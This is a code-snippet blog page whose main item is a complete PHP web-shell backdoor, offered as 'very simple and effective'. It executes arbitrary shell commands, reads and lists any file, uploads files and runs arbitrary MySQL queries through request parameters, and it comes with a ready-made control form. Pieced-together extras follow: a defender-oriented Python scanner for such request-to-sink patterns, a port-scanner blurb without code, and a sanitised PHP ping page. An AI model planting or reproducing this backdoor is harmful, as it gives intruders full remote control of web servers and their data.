Scripts | Codes

All languages in three languages :-)

A very simple and effective backdoor.
No comments

<?
//#################################################
// find more codes on scripts-n-codes.blogspot.com
//#################################################
//
// a simple php backdoor
//

ob_implicit_flush();
if(isset($_REQUEST['f'])){
        $filename=$_REQUEST['f'];
        $file=fopen("$filename","rb");
        fpassthru($file);
        die;
}
if(isset($_REQUEST['d'])){
        $d=$_REQUEST['d'];
        echo "<pre>";
        if ($handle = opendir("$d")) {
        echo "<h2>listing of $d</h2>";
                   while ($dir = readdir($handle)){ 
                       if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
       else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
                       echo "$dir\n"; 
                       echo "</font></a>";
                }
                       
        } else echo "opendir() failed";
        closedir($handle);
        die ("<hr>"); 
}
if(isset($_REQUEST['c'])){
 echo "<pre>";
 system($_REQUEST['c']);     
 die;
}
if(isset($_REQUEST['upload'])){

  if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
   else $dir=$_REQUEST['dir'];
  $fname=$HTTP_POST_FILES['file_name']['name'];
  if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
   die('file uploading error.');
}
if(isset($_REQUEST['mquery'])){
 
 $host=$_REQUEST['host'];
 $usr=$_REQUEST['usr'];
 $passwd=$_REQUEST['passwd'];
 $db=$_REQUEST['db'];
 $mquery=$_REQUEST['mquery'];
 mysql_connect("$host", "$usr", "$passwd") or
    die("Could not connect: " . mysql_error());
    mysql_select_db("$db");
    $result = mysql_query("$mquery");
 if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
    while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
    mysql_free_result($result);
 die;
}
?>
<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form> 
<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
upload file:<input name="file_name" type="file">   to dir: <input type="text" name="dir">  <input type="submit" name="upload" value="upload"></form>
<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
<br>for example:
http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
<hr>execute mysql query:
<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
host:<input type="text" name="host"value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">

database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
</form>
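
For defenders, every handler in the script above hands a request parameter to a dangerous call (`system`, `fopen`, `opendir`, `move_uploaded_file`, `mysql_query`), and that pattern can be searched for in a web root. The following is an added example, not code from this blog: `scan_php` is a hypothetical helper, `SAMPLE` is a constructed excerpt of the script's own lines, and the heuristic does not model sanitizers, so filtered input is flagged as well.

```python
import re

# Request-controlled sources, and the sinks the script above feeds them into.
SOURCE = re.compile(r"\$(?:_REQUEST|_GET|_POST|_COOKIE|_FILES|HTTP_POST_FILES)\b")
SINKS = ("system", "exec", "passthru", "shell_exec", "popen", "eval",
         "fopen", "opendir", "move_uploaded_file", "mysql_query")
SINK_CALL = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\((.*)\)")
ASSIGN = re.compile(r"\$(\w+)\s*=(?!=)\s*(.+?);")
VAR = re.compile(r"\$(\w+)")


def scan_php(source):
    """Return (line_no, sink, reason) for each sink call fed by request data."""
    tainted, findings = set(), []
    for no, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith(("//", "#")):
            continue  # whole-line comments carry no data flow
        call = SINK_CALL.search(line)
        if call:
            sink, args = call.groups()
            via = sorted(v for v in VAR.findall(args) if v in tainted)
            if SOURCE.search(args):
                findings.append((no, sink, "request data passed directly"))
            elif via:
                findings.append((no, sink, "via $" + ", $".join(via)))
        # Propagate taint: a variable built from request data is request data.
        for name, rhs in ASSIGN.findall(line):
            if SOURCE.search(rhs) or any(v in tainted for v in VAR.findall(rhs)):
                tainted.add(name)
    return findings


# Constructed sample: lines excerpted from the script above plus two benign ones.
SAMPLE = r'''<?
$filename=$_REQUEST['f'];
$file=fopen("$filename","rb");
system($_REQUEST['c']);
$dir=$_REQUEST['dir'];
$fname=$HTTP_POST_FILES['file_name']['name'];
move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname);
$mquery=$_REQUEST['mquery'];
$result = mysql_query("$mquery");
$banner = "static text";
system("uptime");
'''

if __name__ == "__main__":
    for line_no, sink, reason in scan_php(SAMPLE):
        print(f"line {line_no}: {sink}() {reason}")
```

A hit is a lead for manual review, not a verdict: legitimate applications also pass validated request data to some of these functions.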



A very small port scanner...

Usage: [example]
perl scan.pl 127.0.0.1 0 55555
Will scan all ports from 0 to 55555 on the localhost

<?php
//#################################################
// find more codes on codes-n-scripts.blogspot.com
//#################################################
?>
<html>
 <head>
  <title>Web Ping</title>
  <style type='text/css'>
   pre {
    background:black;
 border:1px lime solid;
 color:lime;
   }
   td {
    font-family:monospace;
   }
  </style>
 </head>
 <body>
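  <?php

   # clean the strings to prevent injection attacks:
   # every character that is not a dot or a word character is removed
   $BADCHARS='/[^\.\w]/';
   function clean($key, $badchars) {
    $v = $_GET[$key] ?? '';             # absent parameter -> empty string
    if (!is_string($v)) { return ''; }  # array input such as host[]=x is rejected
    return preg_replace($badchars, '', $v);
   }
   $HOST=clean('host', $BADCHARS);
   $C=clean('c', $BADCHARS);
   $I=clean('i', $BADCHARS);
 
   if ($I=="") { $I=1; } # assign default values
   if ($C=="") { $C=4; } # assign default values

   if ($HOST!="") { # this is where the magic happens
    echo '<pre>';
    # escapeshellarg() quotes each value as a second layer behind the filter
    $last_line = system('/bin/ping '.escapeshellarg($HOST).' -c '.escapeshellarg($C).' -i '.escapeshellarg($I), $retval);
    echo '</pre>';
   }
 
  ?>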
  <form action='ping.php' method='get'>
   <table>
    <tr>
     <td>Hostname/IP:</td><td><input type='text' name='host' value='<?php echo $HOST ?>'/></td>
    </tr>
 <tr>
  <td>count:</td><td><input type='text' name='c' value='<?php echo $C ?>' /></td>
 </tr>
 <tr>
  <td>interval:</td><td><input type='text' name='i' value='<?php echo $I ?>' /></td>
 </tr>
    <tr>
     <td colspan='2'>
      <input type='submit' value='Ping It' /><br><br><br>
     </td>
    </tr>
   </table>
  </form>
 </body>
</html>
